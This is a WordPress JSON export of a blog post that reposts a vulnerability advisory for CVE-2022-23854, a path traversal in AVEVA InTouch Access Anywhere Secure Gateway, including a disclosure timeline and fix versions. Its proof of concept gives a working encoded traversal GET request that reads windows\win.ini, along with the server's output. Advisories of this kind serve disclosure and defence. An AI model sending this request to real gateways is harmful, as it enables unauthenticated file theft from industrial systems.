{"id":30237,"date":"2022-09-09T21:10:23","date_gmt":"2022-09-09T17:10:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168328\/avevaitaasg-traversal.txt"},"modified":"2022-09-11T12:21:00","modified_gmt":"2022-09-11T07:51:00","slug":"intouch-access-anywhere-secure-gateway-2020-r2-path-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/intouch-access-anywhere-secure-gateway-2020-r2-path-traversal\/","title":{"rendered":"InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal"},"content":{"rendered":"<p>Title:<br \/>\n======<br \/>\nAVEVA InTouch Access Anywhere Secure Gateway &#8211; Path Traversal<\/p>\n<p>Author:<br \/>\n=======<br \/>\nJens Regel, CRISEC IT-Security<\/p>\n<p>CVE:<br \/>\n====<br \/>\nCVE-2022-23854<\/p>\n<p>Advisory:<br \/>\n=========<\/p>\n<blockquote class=\"wp-embedded-content\" data-secret=\"q969OOu479\"><p><a href=\"https:\/\/crisec.de\/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal\/\" target=\"_blank\" rel=\"noopener\">Advisory: AVEVA InTouch Access Anywhere Secure Gateway &#8211; Path Traversal<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"&#8222;Advisory: AVEVA InTouch Access Anywhere Secure Gateway &#8211; Path Traversal&#8220; &#8212; CRISEC\" src=\"https:\/\/crisec.de\/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal\/embed\/#?secret=0VGc7dzato#?secret=q969OOu479\" data-secret=\"q969OOu479\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<p>Timeline:<br \/>\n=========<br \/>\n25.06.2021 Vulnerability discovered<br \/>\n25.06.2021 Send details to custfirstsupport@aveva.com<br \/>\n21.09.2021 Vendor response, fix is available until Q1\/2022<br \/>\n25.09.2021 Vendor released Tech Alert TA000022335<br \/>\n06.09.2022 Public disclosure<\/p>\n<p>Vendor:<br \/>\n=======<br \/>\nAVEVA Group plc is a marine and plant engineering IT company<br \/>\nheadquartered in Cambridge, England. AVEVA software is used in many<br \/>\nsectors, including on- and off-shore oil and gas processing, chemicals,<br \/>\npharmaceuticals, nuclear and conventional power generation, nuclear fuel<br \/>\nreprocessing, recycling and shipbuilding (https:\/\/www.aveva.com).<\/p>\n<p>Affected Products:<br \/>\n==================<br \/>\nInTouch Access Anywhere Secure Gateway versions 2020 R2 and older<\/p>\n<p>Details:<br \/>\n========<br \/>\nA security vulnerability exists in InTouch Access Anywhere Secure<br \/>\nGateway versions 2020 R2 and older. This is a Relative Path Traversal<br \/>\nvulnerability which allows an unauthenticated user with network access<br \/>\nto the Secure Gateway to read files on the system outside of the Secure<br \/>\nGateway web server.<\/p>\n<p>Proof of Concept:<br \/>\n=================<br \/>\nGET<br \/>\n\/AccessAnywhere\/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini<br \/>\nHTTP\/1.1<\/p>\n<p>HTTP\/1.1 200 OK<br \/>\nServer: EricomSecureGateway\/8.4.0.26844.*<br \/>\n(..)<\/p>\n<p>; for 16-bit app support<br \/>\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1<\/p>\n<p>Fix:<br \/>\n====<br \/>\nInTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix<br \/>\nInTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Title: ====== AVEVA InTouch Access Anywhere Secure Gateway &#8211; Path Traversal Author: ======= Jens Regel, CRISEC IT-Security CVE: ==== CVE-2022-23854 Advisory: ========= Advisory: AVEVA InTouch Access Anywhere Secure Gateway &#8211; Path Traversal Timeline: ========= 25.06.2021 Vulnerability discovered 25.06.2021 Send details to custfirstsupport@aveva.com 21.09.2021 Vendor response, fix is available until Q1\/2022 25.09.2021 Vendor released Tech Alert &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30237","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30237","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30237"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30237\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}